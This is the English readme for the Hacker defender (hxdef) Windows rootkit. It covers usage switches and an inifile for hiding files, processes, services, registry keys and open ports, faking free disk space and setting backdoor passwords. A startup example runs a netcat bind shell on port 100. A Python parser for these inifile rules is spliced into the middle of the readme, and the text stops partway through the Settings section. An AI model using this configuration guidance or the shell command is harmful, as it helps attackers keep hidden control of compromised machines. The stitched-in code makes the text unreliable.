======================[ Hacker defender - English readme ]======================
NT Rootkit
----------
Authors: Holy_Father <holy_father@phreaker.net>
Ratter/29A <ratter@atlas.cz>
Version: 1.0.0
Birthday: 01.01.2004
Home: http://rootkit.host.sk, http://hxdef.czweb.org
Betatesters: ch0pper <THEMASKDEMON@flashmail.com>
aT4r <at4r@hotmail.com>
phj34r <phj34r@vmatrics.net>
unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>
rebrinak
GuYoMe
ierdna <ierdna@go.ro>
Afakasf <undefeatable@pobox.sk>
Readme: Czech & English by holy_father
French by GuYoMe
=====[ 1. Contents ]============================================================
1. Contents
2. Introduction
2.1 Idea
2.2 Licence
3. Usage
4. Inifile
5. Backdoor
5.1 Redirector
6. Technical issues
6.1 Version
6.2 Hooked API
6.3 Known bugs
7. Faq
8. Files
=====[ 2. Introduction ]========================================================
Hacker defender (hxdef) is a rootkit for Windows NT 4.0, Windows 2000
and Windows XP; it may also work on newer NT-based systems. The main code is
written in Delphi 6. New functions are written in assembler. The driver code is
written in C. The backdoor and redirector clients are coded mostly in Delphi 6.
The program uses an adapted LDE32:
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05
The program uses the Superfast/Supertiny Compression/Encryption library:
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.
=====[ 2.1 Idea ]===============================================================
The main idea of this program is to rewrite a few memory segments in all
running processes. Rewriting some basic modules changes the behaviour of those
processes. The rewriting must not affect the stability of the system or of the
running processes.
The program must be absolutely hidden from everyone else. The user is now able
to hide files, processes, system services, system drivers, registry keys and
values and open ports, and to cheat with the free disk space. The program also
masks its changes in memory and hides the handles of hidden processes. The
program installs hidden backdoors, registers itself as a hidden system service
and installs a hidden system driver. The backdoor technology made it possible
to implant the redirector.
=====[ 2.2 Licence ]============================================================
This project in version 1.0.0 is open source.
And of course the authors are not responsible for what you do with
Hacker defender.
=====[ 3. Usage ]===============================================================
Usage of hxdef is quite simple:
>hxdef100.exe [inifile]
or
>hxdef100.exe [switch]
The default name for the inifile is EXENAME.ini, where EXENAME is the name of
the main program's executable without the extension. This is used if you run
hxdef without specifying the inifile or if you run it with a switch (so the
default inifile is hxdef100.ini).
These switches are available:
-:installonly - only install the service, but do not run
-:refresh - update the settings from the inifile
-:noservice - do not install the service, just run normally
-:uninstall - removes hxdef from memory and kills all
running backdoor connections;
stopping the hxdef service now does the same
Example:
>hxdef100.exe -:refresh
Hxdef with its default inifile is ready to run without any change
to the inifile, but it is highly recommended to create your own settings. See
section 4. Inifile for more information about the inifile.
The switches -:refresh and -:uninstall can be called only from the original
exefile. This means you have to know the name and path of the running hxdef
exefile to change its settings or to uninstall it.
=====[ 4. Inifile ]=============================================================
The inifile must contain nine parts: [Hidden Table], [Root Processes],
[Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run],
[Free Space], [Hidden Ports] and [Settings].
In [Hidden Table], [Root Processes], [Hidden Services] and [Hidden RegValues]
the character * can be used as a wildcard in place of the end of a string.
The asterisk can be used only at the end of a string; everything after the
first asterisk is ignored. All spaces before the first and after the last other
character of a string are ignored.
Example:
[Hidden Table]
hxdef*
this will hide all files, dirs and processes whose name starts with "hxdef".
Hidden Table is a list of files, directories and processes which should
be hidden. All files and directories in this list will disappear from file
managers. Programs in this list will be hidden in the task list. Make sure the
main file, the inifile, your backdoor file and the driver file are all in this
list.
Root Processes is a list of programs which will be immune against
infection. You can see hidden files, directories and programs only from these
root programs, so root processes are for rootkit admins. Being listed in
Root Processes does not mean you are hidden: it is possible to have a root
process which is not hidden and vice versa.
Hidden Services is a list of service and driver names which will be
hidden in the database of installed services and drivers. The service name of
the main rootkit program is HackerDefender100 by default; the driver name of
the main rootkit driver is HackerDefenderDrv100. Both can be changed in the
inifile.
Hidden RegKeys is a list of registry keys which will be hidden. The rootkit
has four keys in the registry by default: HackerDefender100,
LEGACY_HACKERDEFENDER100, HackerDefenderDrv100 and LEGACY_HACKERDEFENDERDRV100.
If you rename the service name or driver name you should also change this list.
The first two registry keys, for the service and the driver, are the same as
their names. The next two are LEGACY_NAME, with the name in upper case. For
example, if you change your service name to BoomThisIsMySvc, your registry
entry will be LEGACY_BOOMTHISISMYSVC.
Hidden RegValues is a list of registry values which will be hidden.
Startup Run is a list of programs which the rootkit runs after its startup.
These programs will have the same rights as the rootkit. The program name is
separated from its arguments with a question mark. Do not use " characters.
These programs will terminate after user logon; use the common and well known
methods for starting programs after user logon. You can use the following
shortcuts here:
%cmd% - stands for the system shell executable + path
(e.g. C:\winnt\system32\cmd.exe)
%cmddir% - stands for the system shell executable directory
(e.g. C:\winnt\system32\)
%sysdir% - stands for the system directory
(e.g. C:\winnt\system32\)
%windir% - stands for the Windows directory
(e.g. C:\winnt\)
%tmpdir% - stands for the temporary directory
(e.g. C:\winnt\temp\)
Example:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
a netcat shell is run after the rootkit starts and listens on port 100
2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
this will put a time stamp into temporary_directory\starttime.txt
(e.g. C:\winnt\temp\starttime.txt) every time the rootkit starts
(%TIME% works only with Windows 2000 and higher)
Free Space is a list of hard drives and the number of bytes you want to
add to their free space. The list item format is X:NUM, where X stands for the
drive letter and NUM is the number of bytes that will be added to its number of
free bytes.
Example:
[Free Space]
C:123456789
this will add about 123 MB to the free disk space shown for drive C
Hidden Ports is a list of open ports that you want to hide from
applications like OpPorts, FPort, Active Ports, TCPView etc. It has at most
two lines. The first line has the format TCP:tcpport1,tcpport2,tcpport3 ...,
the second line has the format UDP:udpport1,udpport2,udpport3 ...
Example:
1)
[Hidden Ports]
TCP:8080,456
this will hide two ports: 8080/TCP and 456/TCP
2)
[Hidden Ports]
TCP:8001
UDP:12345
this will hide two ports: 8001/TCP and 12345/UDP
3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800
this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP
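As an added example (not code from the Hacker Defender project), the Python below implements the inifile rules described above: the trailing-asterisk wildcard and space trimming for the hidden/root lists, the default LEGACY_ registry key names, the "program?arguments" form of [Startup Run] with its %...% shortcuts, the X:NUM form of [Free Space] and the TCP:/UDP: lines of [Hidden Ports]. It assumes that name matching is case-insensitive (Windows file names); the sample inifile and the directory values behind the shortcuts are constructed for the demonstration, not taken from any real install.

```python
"""Parser for the hxdef 1.0.0 inifile rules described in this readme.

Added example, not code from the Hacker Defender project. Assumptions: name
matching is case-insensitive (Windows names); the shortcut directory values
and the sample inifile below are constructed for the demonstration.
"""
from typing import Dict, List, Tuple

# Constructed sample inifile, assembled from the examples in this readme.
SAMPLE_INI = """\
[Hidden Table]
hxdef*
   secret.dat
[Startup Run]
c:\\sys\\nc.exe?-L -p 100 -t -e cmd.exe
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
[Free Space]
C:123456789
[Hidden Ports]
TCP:8080,456
UDP:53,54,55,56,800
"""

# Assumed directory values for the shortcuts (the readme's examples use C:\winnt).
SHORTCUTS = {
    "%cmd%": "C:\\winnt\\system32\\cmd.exe",
    "%cmddir%": "C:\\winnt\\system32\\",
    "%sysdir%": "C:\\winnt\\system32\\",
    "%windir%": "C:\\winnt\\",
    "%tmpdir%": "C:\\winnt\\temp\\",
}


def parse_sections(text: str) -> Dict[str, List[str]]:
    """Split the inifile into [Section] -> list of stripped, non-empty lines."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()  # spaces before the first and after the last character are ignored
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def compile_entry(entry: str) -> Tuple[str, bool]:
    """Wildcard rule: cut at the first '*' (the rest is ignored); report whether one was present."""
    name = entry.strip()
    star = name.find("*")
    return (name.lower(), False) if star == -1 else (name[:star].lower(), True)


def is_listed(name: str, entries: List[str]) -> bool:
    """True if NAME matches an entry of a [Hidden Table]-style list (prefix or exact)."""
    target = name.strip().lower()
    for entry in entries:
        prefix, wildcard = compile_entry(entry)
        if (target.startswith(prefix) if wildcard else target == prefix):
            return True
    return False


def default_hidden_regkeys(service_name: str, driver_name: str) -> List[str]:
    """The four keys to hide: both names plus their LEGACY_ upper-case forms."""
    return [service_name, "LEGACY_" + service_name.upper(),
            driver_name, "LEGACY_" + driver_name.upper()]


def parse_startup_run(lines: List[str]) -> List[Tuple[str, str]]:
    """Split 'program?arguments' and expand the %...% shortcuts; %TIME% is left for cmd.exe."""
    result = []
    for line in lines:
        program, _, args = line.partition("?")
        for key, value in SHORTCUTS.items():
            program, args = program.replace(key, value), args.replace(key, value)
        result.append((program, args))
    return result


def parse_free_space(lines: List[str]) -> Dict[str, int]:
    """X:NUM -> {'X': NUM}; NUM bytes get added to the free space shown for drive X."""
    return {d.strip().upper(): int(n) for d, _, n in (line.partition(":") for line in lines)}


def parse_hidden_ports(lines: List[str]) -> Dict[str, set]:
    """At most one TCP: and one UDP: line, comma-separated; an empty port list is allowed."""
    ports: Dict[str, set] = {"TCP": set(), "UDP": set()}
    for line in lines:
        proto, _, rest = line.partition(":")
        proto = proto.strip().upper()
        if proto not in ports:
            raise ValueError(f"unknown protocol line: {line!r}")
        ports[proto] |= {int(p) for p in rest.split(",") if p.strip()}
    return ports
```

Running `parse_sections(SAMPLE_INI)` and feeding each section to its parser shows the documented behaviour: `hxdef*` hides hxdef100.exe and hxdef100.ini alike, `secret.dat` (whitespace trimmed, no wildcard) hides only an exact match, the second [Startup Run] line expands to the cmd.exe path and `C:\winnt\temp\starttime.txt` while leaving `%TIME%` for the shell, and a bare `TCP:` line yields an empty TCP set.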
Settings contains eight values: Password, BackdoorShell,
FileMappingName, ServiceName, ServiceDisplayName, ServiceDescription,
DriverName and DriverFileName.
Password is a 16-character string used when working with the backdoor
or the redirector. The password can be shorter; the rest is filled with spaces.
BackdoorShell is the name of the copy of the system shell which the
backdoor creates in the temporary directory.
FileMappingName is the name of the shared memory where the settings for
hooked processes are stored.
ServiceName is the name of the rootkit service.
ServiceDisplayName is the display name of the rootkit service.
ServiceDescription is the description of the rootkit service.
DriverName is the name of the hxdef driver.
DriverFileName is the name of the hxdef driver file.
Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef